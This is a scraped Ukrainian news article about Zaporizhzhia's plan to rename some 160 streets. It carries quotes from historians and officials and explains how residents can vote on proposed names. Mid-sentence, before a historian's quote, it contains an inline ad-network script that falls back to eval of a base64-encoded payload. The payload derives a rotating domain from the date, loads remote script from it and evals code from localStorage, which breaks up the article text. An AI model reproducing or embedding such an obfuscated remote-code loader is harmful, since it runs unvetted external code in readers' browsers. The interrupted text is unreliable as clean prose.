Мешканцям Запоріжжя пропонують обрати нові назви 160 вулицям: як взяти участь

У Запоріжжі збираються позбавитись від русизмів в найменуваннях вулиць, а також всього, що пов’язано з руським миром, комуністичноїю спадщиною та країною-агресором. Наразі робоча група розглядає різні варіанти перейменування. Долучитися до процесу можуть всі містяни.

Проголосувати за той, чи інший варіант, або надати свій можна на сайті мерії. Про це повідомляють Запорізькі Вісті.

Технічне опрацювання різних варіантів майбутніх назв відбувається на засіданнях робочої групи. Це вже п’ятий таких захід. Сьогодні розглядають перейменування 27-ми вулиць Дніпровського району.

Завдання робочої групи – запропонувати назви, які б прикрасили наше місто, – зазначила голова робочої групи з устаткування урбанонімів Запоріжжя Тетяна Міхєєва , – в нас дуже яскрава історія міста, у нас дуже велика спадщина туристична і задача прикрасити місто цими назвами. Включаючи історичні події, саме наші місцеві, суто українські. Згадати українських наших рідних митців, істориків, державних діячів, науковців, загадати якісь історичні події

Над створенням нового топонімічного поля працюють історики та краєзнавці. На думку фахівців, в нових назвах повинна поєднуватись не тільки гарна патріотична ідея, а й благозвучність. Доктор історичних наук, професор Віктор Філас пояснює:

“У Варшаві є вулиця Червоних беретов, це підрозділи польської армії так звана 6 поморська бригада ВДВ. Вони носять червоні берети. Це один із елітних підрозділів, один із відомих підрозділів, але вулиця не має назву 6 бригади. А вулиця має мазву Червоні берети, всі знають, що Червоні берети це. І звучить красиво і там стоїть пам’ятний знак. Це саме пропоную по вул. Воронезькій зробити. Не 9 полк Нацгвардії, а наприклад вул. Запорізьких гвардійців”.

Відомий краєзнавець Роман Акбаш вважає, що нові назви запорізьким вулицям треба обирати дуже ретельно: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

“Я дещо не зрозумів чому людина яка пожертвували своїм життям щоб спасти запорізьких дітей, це я маю на увазі Михайла Билкіна, якого до сих пір я знаю людей із Запоріжжя-Лівого, вони знають про цей його подвиг, хоча це було 72 роки тому. Це у них місцевий герой який на Запоріжжі-Лівому врятував 2 діточок на залізниці. Витягнув з під потяга а сам залишився під потягом. Чому його треба перейменовувати це мені не зрозуміло і чому замість Билкіна повинна бути вулиця Коксохімічна”.

Серед цікавих пропозицій – перейменувати вулицю Волзька у Шевченківському районі на вулицю Андрія Лободи, лідера гурту «Хорта» та автора неофіційного гімну Запоріжжя, який пішов у засвіти.

“Якраз спитав у Юрка Юрченка, друга Андрія, як він вважає яку вулицю в місті яка підходе які мають назви на честь російських міст, їх вже все одно мають перейменовувати рано чи пізно. І ми якраз вибрали цю вулицю по якої як мені сказав Юрко Андрій ходів до школи разом з ним. Це вул.. Волзька, ось вона там поруч з Магістральною, де жив Андрій. Навіщо її Каліграфічною називати якщо у нас є гідна постать така людина”, – додає Роман Акбаш.

Долучитися ж до створення нових назв закликають усіх небайдужих. Загалом дерусифікувати планують близько 160 вулиць.

“Якщо є бажання можете долучатися. Сьогодні до нас доєдналися і міські діячі, громадські діячі яким небайдуже вся ця ситуація і не подобається як приймає рішення комісія. Тому є свої заохочення побажання і все інше. Тому ми відкриті для всіх. Приходьте допомагайте, нам в цьому місті жить разом з вами, нашим дітям по цим вулицям ходити , запам’ятовувати як це називається. Тому запрошуємо всіх, щоб всі приходили та разом з вами замінювати ці радянські назви”, – запрошує депутат міськради Михайло Прасол.

Подивитися опрацьовані назви вулиць разом із пропозиціями, а також проголосувати за них можна на сайті мерії. Після цього документи потраплять до робочої групи з топоніміки, яка вже зможе дати доручення та підготувати проект рішення з перейменування. Затвердити його мають депутати на сесії міської ради. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/meshkantsyam-zaporizhzhya-proponuyut-obrati-novi-nazvi-160-vulitsyam-yak-vzyati-uchast/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top